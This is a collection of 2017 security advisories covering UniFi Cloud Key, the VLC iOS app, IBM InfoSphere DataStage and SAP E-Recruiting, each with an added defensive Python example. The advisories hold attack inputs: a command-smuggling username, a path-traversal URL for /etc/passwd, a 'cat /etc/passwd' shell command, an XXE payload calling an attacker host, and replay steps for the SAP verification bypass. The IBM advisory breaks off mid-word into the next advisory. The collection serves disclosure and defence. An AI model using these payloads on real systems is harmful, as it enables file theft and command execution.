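    # Constructed request bodies: one valid, one carrying shell metacharacters.
    for body in ('{"username":"alice"}', '{"username":"alice; id"}'):
        try:
            print(body, "->", build_chusername_argv(parse_account_request(body)))
        except ValueError as exc:
            print(body, "-> rejected:", exc)
```

The PHP equivalent of the second layer is to keep `exec()` but pass `escapeshellarg($username)`; the allowlist is still worth having, because the helper itself may treat characters such as a leading hyphen specially.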


Vulnerable / tested versions:
-
Ubiquiti Networks UniFi Cloud Key version 0.6.1 has been tested.
This version was the latest at the time the security vulnerabilities
were discovered. Version 0.6.4 has been checked and found to be
vulnerable as well.


Vendor contact timeline:

2017-03-29: Contacting vendor via HackerOne. Vendor sets status to "Triaged".
2017-04-24: Asking for a status update; no answer.
2017-05-06: Found update 0.6.4 on the website of the vendor, firmware is still vulnerable.
2017-05-15: Contacted vendor via e-mail and asked for status.
2017-06-01: Vendor sent a link to the fixed version 0.6.9.
2017-06-07: Verified the fix in this version. Vendor marked the issue as resolved.
2017-09-13: Public release of security advisory


Solution:
-
Upgrade to v0.6.9 or above.
https://community.ubnt.com/t5/UniFi-Updates-Blog/UniFi-Cloud-Key-firmware-0-6-9-has-been-released/ba-p/1974091


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~


[FD] SEC Consult SA-20170913-1 :: Local File Disclosure in VLC media player iOS app

2017-09-13 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170913-1 >
===
  title: Local File Disclosure
product: VLC media player iOS app
 vulnerable version: 2.7.8
  fixed version: 2.8.1
 CVE number: -
 impact: Medium
   homepage: https://itunes.apple.com/us/app/vlc-for-mobile/id650377962?mt=8
  found: 2017-08-22
 by: Ahmad Ramadhan Amizudin (Office Malaysia)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"VLC is a free and open source cross-platform multimedia player and framework
that plays most multimedia files as well as DVDs, Audio CDs, VCDs, and various
streaming protocols."

Source: https://itunes.apple.com/us/app/vlc-for-mobile/id650377962?mt=8


Business recommendation:

The identified vulnerability allows attackers to steal arbitrary files
(accessible by the app) from the mobile device.

SEC Consult recommends not enabling the "Sharing over WiFi" feature in VLC
for iOS, which allows wireless file transfer to/from a PC, until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
---
1) Local file disclosure
The 'Sharing over WiFi' feature in VLC for iOS is vulnerable to a local file
disclosure vulnerability. An attacker can read any files which can be accessed
with current application privileges. This issue can lead to data theft.


Proof of concept:
-
1) Local file disclosure
The example below shows how the LFD vulnerability can be exploited.

URL : http://$IP:$PORT/download/
METHOD  : GET
EXAMPLE : http://$IP:$PORT/download//etc/passwd


The source code excerpt below shows the vulnerable code of the mobile app:

VULN. FILE : Sources/VLCHTTPConnection.m
VULN. CODE :
[...]
- (NSObject *)_httpGETDownloadForPath:(NSString *)path
{
    NSString *filePath = [[path stringByReplacingOccurrencesOfString:@"/download/"
                                                          withString:@""]
                          stringByReplacingPercentEscapesUsingEncoding:NSUTF8StringEncoding];
    HTTPFileResponse *fileResponse = [[HTTPFileResponse alloc] initWithFilePath:filePath
                                                                  forConnection:self];
    fileResponse.contentType = @"application/octet-stream";
    return fileResponse;
}
[...]
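The excerpt strips the "/download/" prefix, percent-decodes the remainder and hands it straight to a file response, so "/download//etc/passwd" becomes the absolute path "/etc/passwd" and "..%2F.." walks out of the share. What is missing is confinement: the name has to be resolved relative to the directory being shared and refused whenever the real path ends up outside it. The function below is an added example in Python, not VLC's code; SHARE_DIR is an assumed location standing in for the app's Documents directory, and the request paths in the test are constructed.

```python
import os
from urllib.parse import unquote

# Assumed share root for the example; on the device this would be the app's
# Documents directory.
SHARE_DIR = "/tmp/vlc-share"
PREFIX = "/download/"


def resolve_download(request_path, share_dir=SHARE_DIR):
    """Map a request path to a file inside share_dir.

    Returns the path relative to share_dir, or None when the request does not
    name a file inside the share: an absolute path after the prefix, '..'
    traversal (encoded or not), a NUL byte, or the share directory itself.
    """
    # Match the prefix on the raw path and decode only what remains; decoding
    # is done exactly once so a double-encoded "%252e%252e" stays literal.
    if not request_path.startswith(PREFIX):
        return None
    name = unquote(request_path[len(PREFIX):])
    if not name or "\x00" in name:
        return None
    root = os.path.realpath(share_dir)
    # os.path.join discards root when name is absolute ("/etc/passwd"), and
    # realpath collapses "..", so both escapes surface as a path outside root.
    candidate = os.path.realpath(os.path.join(root, name))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        return None
    return os.path.relpath(candidate, root)


if __name__ == "__main__":
    # Constructed requests: the advisory's example and two legitimate ones.
    for req in ("/download//etc/passwd", "/download/..%2F..%2Fetc%2Fpasswd",
                "/download/movie%20night.mp4", "/download/clips/../intro.mp4"):
        print(req, "->", resolve_download(req))
```

Comparing with the resolved root (realpath on both sides) rather than with the configured string matters when the share directory is itself reached through a symlink; comparing the prefix as a string would also accept "/tmp/vlc-share-private/x", which is why commonpath is used instead of startswith.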


Vulnerable / tested versions:
-
VLC version 2.7.8 has been tested on iOS 10.3.3 and found to be vulnerable.


Vendor contact timeline:

2017-08-23: Contacting vendor through email
2017-08-23: Vendor replied, they are looking at it
2017-09-05: Asked for a status update from the vendor
2017-09-09: Vendor released patch in version 2.8.1
2017-09-13: Public release of advisory


Solution:
-
Upgrade to the latest version available:
https://itunes.apple.com/us/app/vlc-for-mobile/id650377962?mt=8


Workaround:
---
Disable the 'Sharing over WiFi' feature.


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~


~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Ahmad Ramadhan / @2017




[FD] SEC Consult SA-20170913-0 :: Multiple Vulnerabilities in IBM Infosphere Information Server / Datastage

2017-09-13 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170913-0 >
===
  title: Multiple Vulnerabilities
product: IBM Infosphere Information Server / Datastage
 vulnerable version: 9.1, 11.3, and 11.5 (including Cloud version 11.5)
  fixed version: -
 CVE number: CVE-2017-1495, CVE-2017-1468, CVE-2017-1383, CVE-2017-1467
 impact: Critical
   homepage: http://www-03.ibm.com/software/products/en/ibminfodata
  found: 2017-03-16
 by: Goh Zhi Hao, Mohammad Shah Bin Mohammad Esa, Samandeep Singh (Office Singapore)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"IBM® InfoSphere® DataStage® integrates data across multiple systems
using a high performance parallel framework, and it supports extended
metadata management and enterprise connectivity. The scalable platform
provides more flexible integration of all types of data, including big
data at rest (Hadoop-based) or in motion (stream-based), on distributed
and mainframe platforms."

Source: http://www-03.ibm.com/software/products/en/ibminfodata


Business recommendation:

Attackers are able to bypass authorization controls to execute system commands.
The vendor did not provide a patch, only mitigation steps, which have to be
implemented.

SEC Consult recommends the vendor to conduct a comprehensive security analysis,
based on security source code reviews, in order to identify all vulnerabilities
in the Remote Management platform and increase the security for its customers.


Vulnerability overview/description:
---
1) Weak Authorization (CVE-2017-1467)
The Administrator Client allows users with high privileges to execute commands.
A low-privileged application user can replay the same request and execute
arbitrary commands on the server.

This happens because the application maps all application users to a single
Linux user on the backend server. The effective privileges are those of this
system user, irrespective of the role of the application user.

Hence, any command can be executed by a low-privileged application user on the
backend OS, with the privileges of the Linux user the application is using.


2) XML eXternal Entity (XXE) Injection (CVE-2017-1383)
The Designer client allows users to import files in XML format. By tricking a
user into importing an XML file with malicious XML code into the application,
it is possible to exploit an XXE vulnerability within the application.


3) DLL Preloading
Dynamic Link Library (DLL) files are loaded from the application's home
directory without being verified. This may lead to execution of arbitrary files
on the system, as any user can replace the DLLs.


4) Loading Arbitrary Executables (CVE-2017-1468)
The Director and Designer Client do not check for any file signatures before
loading and executing other executable files. Existing files can be replaced by
any user with executable files, which will be executed from the toolbar.


5) Cleartext Passwords in Memory Dump (CVE-2017-1495)
User credentials are stored in clear text within the memory which can be
dumped to retrieve these credentials.


Proof of concept:
-
1) Weak Authorization (CVE-2017-1467)
Any command can be injected back to the Administrator Client to execute system
commands.
Example:
==
SH -c "cat /etc/passwd"
==

2) XML External Entity Injection (XXE) (CVE-2017-1383)
For example, by importing the following XML code, arbitrary files can be read
from the client's system. The following code makes the client system open a
connection to the attacker's system.

===
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "http://[IP:port]/" >]>
<data>&xxe;</data>
===

IP:port = IP address and port where the attacker is listening for connections

Furthermore some files can be exfiltrated to remote servers via the
techniques described in:

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
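The import works as an XXE vector because the Designer client's parser honours the DOCTYPE internal subset, so an ENTITY with a SYSTEM identifier makes the client fetch a remote or local resource. For an import format that has no need for a DTD, the cheapest defence is a gate in front of the real parser that refuses any document declaring entities or referencing an external DTD. The block below is an added example, not IBM code: it drives the standard library's expat parser with DOCTYPE and entity-declaration callbacks and never installs an external-entity handler, so the gate itself cannot be made to fetch anything. The two sample documents are constructed; the URL in the first is the advisory's placeholder.

```python
import xml.parsers.expat


class _DtdWatcher:
    """Records what the DOCTYPE declares while expat reads the prologue."""

    def __init__(self):
        self.doctype = None   # (name, system_id, public_id)
        self.entities = []    # (name, system_id or None)

    def start_doctype(self, name, system_id, public_id, has_internal_subset):
        self.doctype = (name, system_id, public_id)

    def entity_decl(self, name, is_parameter, value, base, system_id,
                    public_id, notation):
        self.entities.append((name, system_id))


def xml_dtd_findings(data):
    """Return reasons to refuse an XML import; an empty list means no DTD content."""
    watcher = _DtdWatcher()
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = watcher.start_doctype
    parser.EntityDeclHandler = watcher.entity_decl
    # No ExternalEntityRefHandler is installed, so expat only reports the
    # declaration and never dereferences the SYSTEM identifier itself.
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        return ["not well-formed XML: %s" % exc]
    findings = []
    if watcher.doctype and (watcher.doctype[1] or watcher.doctype[2]):
        findings.append("DOCTYPE references an external DTD: %r" % (watcher.doctype[1],))
    for name, system_id in watcher.entities:
        if system_id:
            findings.append("external entity %r -> %s" % (name, system_id))
        else:
            findings.append("entity %r declared in internal subset" % name)
    return findings


def is_import_allowed(data):
    """Import policy: accept only documents without any DTD entity content."""
    return not xml_dtd_findings(data)


# Constructed sample: the shape of the advisory's proof of concept.
XXE_SAMPLE = b"""<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "http://[IP:port]/" >]>
<data>&xxe;</data>
"""

# Constructed sample: an ordinary export with no DOCTYPE at all.
BENIGN_SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<export><job name="load_customers"><stage type="Transformer"/></job></export>
"""

if __name__ == "__main__":
    for label, doc in (("xxe", XXE_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, "->", xml_dtd_findings(doc) or "accepted")
```

Rejecting internal entities as well as external ones is deliberate: internal entities are the building block of entity-expansion denial of service, and a client-side importer gains nothing from them. If the real importer uses a different XML library, the same policy should additionally be configured there (disable DTD processing and external entity resolution), since the pre-check only covers the bytes it was shown.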

3) DLL Preloading
Removed proof of concept.

4) Loading Arbitrary Executables (CVE-2017-1468)
The following executables can be re

[FD] SEC Consult SA-20170912-0 :: Email verification bypass in SAP E-Recruiting

2017-09-12 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170912-0 >
===
  title: Email verification bypass
product: SAP E-Recruiting
 vulnerable version: 605, 606, 616, 617
  fixed version: see SAP security note number 2507798
 impact: medium
   homepage: https://www.sap.com
  found: 2017-07-12
 by: Marc Nimmerrichter (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Berlin - Frankfurt/Main - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"SAP E-Recruiting" has recruitment and succession planning instruments that
will help your company find new employees, employ them in positions that suit
their capabilities, promote their professional development, and retain them in
the long term.
As well as enabling you to handle your company’s applicant tracking activities,
"SAP E-Recruiting" ensures that you drive up-to-date human resources management,
by proactively maintaining contact with applicants, potential candidates, and
consequently, with your employees.

Source:
https://help.sap.com/saphelp_erp60_sp/helpdata/en/73/8bcf535b804808e1000a174cb4/frameset.htm


Business recommendation:

Email address verification during the applicant registration can be bypassed.
Businesses using the vulnerable component are advised to estimate the impact of
insufficient email address verification on their business processes and react
accordingly. It is recommended to install a patched version as soon as possible.


Vulnerability overview/description:
---
When an external applicant registers to the E-Recruiting application, he/she
receives a link by email to confirm access to the provided email address.
However, this measure can be bypassed and attackers can register and confirm
email addresses that they do not have access to.

An attacker could register email addresses not belonging to him/her. This could
have a business impact, because business processes might rely on a verified
email address. Furthermore, since an email address can be registered only once,
an attacker could prevent other legitimate users from registering to the
E-Recruiting application.


Proof of concept:
-
The email verification link contains the "param" HTTP GET parameter with base64
encoded data. When decoded, this data contains the parameters
"candidate_hrobject" and "corr_act_guid". candidate_hrobject is an incremental
user ID. corr_act_guid is a random value that needs to be provided during the
email verification. However, this value is not bound to the current
registration, which means that the value of a previous registration can be
reused. Since candidate_hrobject is incremental, it can be guessed by an
attacker. An attacker who wants to register with an email address not belonging
to him/her, could simply do the following:

  1. Register with his own email address
  2. Directly afterwards register with someone else's email address
  3. Read the current value of candidate_hrobject in the confirmation
 link from the first registration
  4. Increment this value by 1
  5. Send the new value in the HTTP GET request, using the corr_act_guid
 parameter from the first registration
  6. If this did not work: go back to step 4 to try the next ID
 (maybe other people registered in between the two registrations)

This attack works because there is no per-registration nonce in the
confirmation link.
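The missing binding can be shown concretely. The model below is an added example, not SAP code: it keeps the two fields the advisory names, candidate_hrobject (still sequential) and corr_act_guid, but issues a fresh nonce for each registration, stores it with that registration, and covers id, e-mail and nonce with a server-side HMAC, so a param from one registration cannot be edited to confirm the next one. The in-memory dictionary stands in for the applicant table, the e-mail addresses are constructed, and SERVER_KEY is assumed to be a long-lived per-deployment secret (generated per run here).

```python
import base64
import hashlib
import hmac
import json
import os

# Assumed: a per-deployment secret kept server-side; generated per run here.
SERVER_KEY = os.urandom(32)

# Stand-in for the candidate table: candidate_hrobject -> registration record.
registrations = {}
_next_candidate_id = [1000]


def _mac(candidate_id, email, nonce):
    """HMAC over the (id, email, nonce) triple, so no field can be swapped out."""
    msg = ("%d\x00%s\x00%s" % (candidate_id, email, nonce)).encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def build_param(candidate_id, email, nonce):
    """Encode the link payload the same way the advisory describes: base64 of the fields."""
    payload = {"candidate_hrobject": candidate_id, "corr_act_guid": nonce,
               "mac": _mac(candidate_id, email, nonce)}
    return base64.urlsafe_b64encode(json.dumps(payload).encode()).decode()


def register(email):
    """Create a registration and return (candidate_hrobject, confirmation param)."""
    candidate_id = _next_candidate_id[0]   # still incremental, as in the original
    _next_candidate_id[0] += 1
    nonce = base64.urlsafe_b64encode(os.urandom(16)).decode().rstrip("=")
    registrations[candidate_id] = {"email": email, "nonce": nonce, "confirmed": False}
    return candidate_id, build_param(candidate_id, email, nonce)


def confirm(param):
    """Validate a confirmation param; returns True exactly once per registration."""
    try:
        payload = json.loads(base64.urlsafe_b64decode(param))
        candidate_id = int(payload["candidate_hrobject"])
        guid = str(payload["corr_act_guid"])
        mac = str(payload["mac"])
    except (ValueError, KeyError, TypeError):
        return False
    record = registrations.get(candidate_id)
    if record is None or record["confirmed"]:
        return False
    # The guid must be the nonce issued for *this* registration, so a guid
    # copied from an earlier registration and sent with id+1 is refused ...
    if not hmac.compare_digest(record["nonce"], guid):
        return False
    # ... and the MAC must cover this exact id/email/nonce, so editing the id
    # inside the decoded param invalidates the token as well.
    if not hmac.compare_digest(_mac(candidate_id, record["email"], guid), mac):
        return False
    record["confirmed"] = True
    return True


def replay_with_next_id(param):
    """Steps 3-5 of the advisory: keep corr_act_guid, bump candidate_hrobject by one."""
    payload = json.loads(base64.urlsafe_b64decode(param))
    payload["candidate_hrobject"] = int(payload["candidate_hrobject"]) + 1
    return base64.urlsafe_b64encode(json.dumps(payload).encode()).decode()


if __name__ == "__main__":
    _, own = register("attacker@example.com")      # constructed addresses
    _, victim = register("victim@example.com")
    print("replayed param with next id:", confirm(replay_with_next_id(own)))
    print("genuine victim link:", confirm(victim))
```

Either check alone closes the bypass described above; the stored nonce also makes the link single-use, and the MAC keeps the param tamper-evident without a database round trip, which is why both are kept.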


Vulnerable / tested versions:
-
The vulnerability was found in the following release of E-Recruiting (ERECRUIT):
Release: 617

According to the vendor, the following versions are affected:
Release: 605, 606, 616, 617


Vendor contact timeline:

2017-07-12: Contacted vendor via encrypted email with vulnerability description
and Responsible Disclosure Policy attached at sec...@sap.com
2017-07-13: Vendor confirmed the receipt of the email
2017-07-25: Vendor confirmed the vulnerability
2017-07-31: Contacted vendor to ask for patch release date and versions affected
2017-08-01: Vendor stated they are working on the fix and requested "adequate
time". Link to SAP Responsible Disclosure Policy was provided.
2017-08-01: Discussing release date, requested planned patch release date and
versions affected.
2017-08-02: Vendor stated that the patch cannot be published until 2017-08-31
and requested more time before advisory publication.
2017-08-23: Contacted vendor to request current patch status, p
